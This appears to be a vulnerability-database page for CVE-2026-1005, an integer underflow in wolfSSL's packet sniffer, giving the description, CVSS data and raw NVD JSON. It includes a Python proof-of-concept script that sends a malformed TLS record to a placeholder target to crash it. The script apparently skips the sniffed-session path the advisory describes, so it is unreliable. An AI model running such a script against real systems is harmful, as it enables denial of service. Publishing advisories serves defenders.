Security Vulnerability Report
中文
CVE-2026-1005 CVSS 5.3 MEDIUM

CVE-2026-1005

Published: 2026-03-19 17:16:22
Last Modified: 2026-04-29 18:48:38
Source: [email protected]

Description

Integer underflow in wolfSSL packet sniffer <= 5.8.4 allows an attacker to cause a buffer overflow in the AEAD decryption path by injecting a TLS record shorter than the explicit IV plus authentication tag into traffic inspected by ssl_DecodePacket. The underflow wraps a 16-bit length to a large value that is passed to AEAD decryption routines, causing heap buffer overflow and a crash. An unauthenticated attacker can trigger this remotely via malformed TLS Application Data records.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:* - VULNERABLE
wolfSSL packet sniffer <= 5.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket import struct # Target IP and Port (replace with actual target) TARGET_IP = "192.168.1.100" TARGET_PORT = 443 def create_malformed_tls_record(): # TLS Record Header content_type = 0x17 # Application Data version = 0x0303 # TLS 1.2 # Length is set to a small value (e.g., 10 bytes) which is smaller than IV + Tag # This triggers the underflow in ssl_DecodePacket length = 10 header = struct.pack(">BHH", content_type, version, length) # Payload (arbitrary data, length must match header length) payload = b"A" * length return header + payload def send_exploit(): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) # Send malformed TLS record malformed_packet = create_malformed_tls_record() s.send(malformed_packet) print("Malformed packet sent successfully.") s.close() except Exception as e: print(f"Error: {e}") if __name__ == "__main__": send_exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-1005", "sourceIdentifier": "[email protected]", "published": "2026-03-19T17:16:21.873", "lastModified": "2026-04-29T18:48:38.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Integer underflow in wolfSSL packet sniffer <= 5.8.4 allows an attacker to cause a buffer overflow in the AEAD decryption path by injecting a TLS record shorter than the explicit IV plus authentication tag into traffic inspected by ssl_DecodePacket. The underflow wraps a 16-bit length to a large value that is passed to AEAD decryption routines, causing heap buffer overflow and a crash. An unauthenticated attacker can trigger this remotely via malformed TLS Application Data records."}, {"lang": "es", "value": "Un desbordamiento negativo de enteros en el sniffer de paquetes wolfSSL &lt;= 5.8.4 permite a un atacante causar un desbordamiento de búfer en la ruta de descifrado AEAD inyectando un registro TLS más corto que el IV explícito más la etiqueta de autenticación en el tráfico inspeccionado por ssl_DecodePacket. El desbordamiento negativo convierte una longitud de 16 bits en un valor grande que se pasa a las rutinas de descifrado AEAD, causando un desbordamiento de búfer en el heap y un fallo. Un atacante no autenticado puede activar esto de forma remota a través de registros de datos de aplicación TLS malformados."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-191"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wolfssl:wolfssl:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.8.4", "matchCriteriaId": "07D6603F-8F67-4D0F-844B-288FDA5E8001"}]}]}], "references": [{"url": "https://github.com/wolfSSL/wolfssl/pull/9571", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.